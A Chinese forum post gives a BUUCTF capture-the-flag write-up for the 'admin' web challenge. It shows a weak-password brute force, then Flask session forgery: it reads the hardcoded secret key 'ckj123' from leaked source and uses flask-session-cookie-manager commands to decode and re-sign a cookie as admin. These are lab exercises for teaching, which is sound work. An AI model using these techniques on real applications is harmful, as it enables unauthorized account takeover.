曹旭辉 发表于 2025-2-24 18:49:31

BUUCTF-Web方向21-25wp

admin

打开情况,有三处提示,一个跳转链接,一个登录注册,一个提示不是admin
https://track123.oss-cn-beijing.aliyuncs.com/20250223103944979.png
点击hctf,无法访问
https://track123.oss-cn-beijing.aliyuncs.com/20250223104114614.png
注册个账号,依旧无法查看,看来需要admin账号
https://track123.oss-cn-beijing.aliyuncs.com/20250223104255765.png
弱口令

爆破暗码
https://track123.oss-cn-beijing.aliyuncs.com/20250223104530751.png
当暗码未123长度明显差别
https://track123.oss-cn-beijing.aliyuncs.com/20250223104816911.png
登录
https://track123.oss-cn-beijing.aliyuncs.com/20250223104829696.png
session伪造

在修改暗码界面,提示session
https://track123.oss-cn-beijing.aliyuncs.com/20250223105122024.png
下载该源码查看,index.php
{% include('header.html') %}
{% if current_user.is_authenticated %}
<h1 >Hello {{ session['name'] }}</h1>
{% endif %}
{% if current_user.is_authenticated and session['name'] == 'admin' %}       //session的name=admin才行
<h1 >hctf{xxxxxxxxx}</h1>
{% endif %}

<h1 >Welcome to hctf</h1>

{% include('footer.html') %}session值
.eJw9UE2PgjAQ_SubOXuQghcTD26KRpJpgykh04txEYFC3QQ1QI3_faubeJi8w_uYN_OAw7kvrzUsb_29nMGhOcHyAV8_sASy2iCvFqgokHk8IaOB8t1c8nYSLB00_65lvumkykZy-xpNHAmXhTpPvDN2wsYM7d6QWjPhUoeqCsh6ncVRvjTce_mmIdOGMscFuXgSvJgLtgu812PKSPkOeRaJ7aYjV4V6mwV6S6Pku0mbtfPZkZ8VPGdQXPvz4fbblpfPCWiKQShiyNKQTDUK489wSatNNiBvI-SFr-5XqaR5IZmTwWr1jmvssSo_SWVXx1n6z1yO1hNw649FCzO4X8v-_TcI5vD8A-s4bN0.Z7qRbQ.v-Ap7KW-T8GzuEtnu2WDl_-2plg在config.py中
import os
class Config(object):
    SECRET_KEY = os.environ.get('SECRET_KEY') or 'ckj123'   //secret_key=ckj123
    SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:adsl1234@db:3306/test'
    SQLALCHEMY_TRACK_MODIFICATIONS = True工具下载
git clone https://github.com/noraj/flask-session-cookie-managerhttps://track123.oss-cn-beijing.aliyuncs.com/20250223111234528.png
解密:
python3 flask_session_cookie_manager3.py decode -c .eJw9UE2PgjAQ_SubOXuQghcTD26KRpJpgykh04txEYFC3QQ1QI3_faubeJi8w_uYN_OAw7kvrzUsb_29nMGhOcHyAV8_sASy2iCvFqgokHk8IaOB8t1c8nYSLB00_65lvumkykZy-xpNHAmXhTpPvDN2wsYM7d6QWjPhUoeqCsh6ncVRvjTce_mmIdOGMscFuXgSvJgLtgu812PKSPkOeRaJ7aYjV4V6mwV6S6Pku0mbtfPZkZ8VPGdQXPvz4fbblpfPCWiKQShiyNKQTDUK489wSatNNiBvI-SFr-5XqaR5IZmTwWr1jmvssSo_SWVXx1n6z1yO1hNw649FCzO4X8v-_TcI5vD8A-s4bN0.Z7qRbQ.v-Ap7KW-T8GzuEtnu2WDl_-2plg -s ckj123https://track123.oss-cn-beijing.aliyuncs.com/20250223111546572.png
解密结果,这里我们需要将name改成admin
{'_fresh': True, '_id': b'bfc0891659a23f0ab48927d0d0a9ae951c4a218757ebff136a62dca06743185bda2c19bfd1e81bb979c9c124747b56a47d6a6c1e84aec87de5df1822f03a08a0', 'csrf_token': b'2705663d7b8161232df50098071c1452bc14b7c2', 'image': b'zXDQ', 'name': 'track', 'user_id': '10'}举行session伪造
python3 flask_session_cookie_manager3.py encode -t "{'_fresh': True, '_id': b'bfc0891659a23f0ab48927d0d0a9ae951c4a218757ebff136a62dca06743185bda2c19bfd1e81bb979c9c124747b56a47d6a6c1e84aec87de5df1822f03a08a0', 'csrf_token': b'2705663d7b8161232df50098071c1452bc14b7c2', 'image': b'zXDQ', 'name': 'admin', 'user_id': '10'}" -s ckj123https://track123.oss-cn-beijing.aliyuncs.com/20250223112125285.png
伪造的session
.eJw9UE2PgjAQ_SubOXuQghcTD26KBpJpgykh04txEYFi3QQ1QI3_faubeJi8w_uYN_OA_amvrg0sb_29msG-PcLyAV8_sASy2iCvF6gokEU8IaOBimQueTcJlg2afzey2JylykdyuwZNHAmXh7pIvTN2wsYM7c6QWjPhMoeqDsh6ncVRvjTce_mmJdOFssAFuXgSvJwLlgTe6zFjpHyHIo_EdnMmV4d6mwd6S6PkyaTN2vnsyM8KnjMor_1pf_vtqsvnBDTlIBQxZFlIph6F8We4tNMmH5B3EfLSV_erVNq-kMzRYL16x7X2UFefpOrcxHn2z1wO1hNwONr2AjO4X6v-_TcI5vD8A-oIbNE.Z7qUFw.wgQI2lOZR0DLoEc8neo5vNoDBaU在初始页面包中修改session,拿到flag
https://track123.oss-cn-beijing.aliyuncs.com/20250223112844984.png
你传你
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: BUUCTF-Web方向21-25wp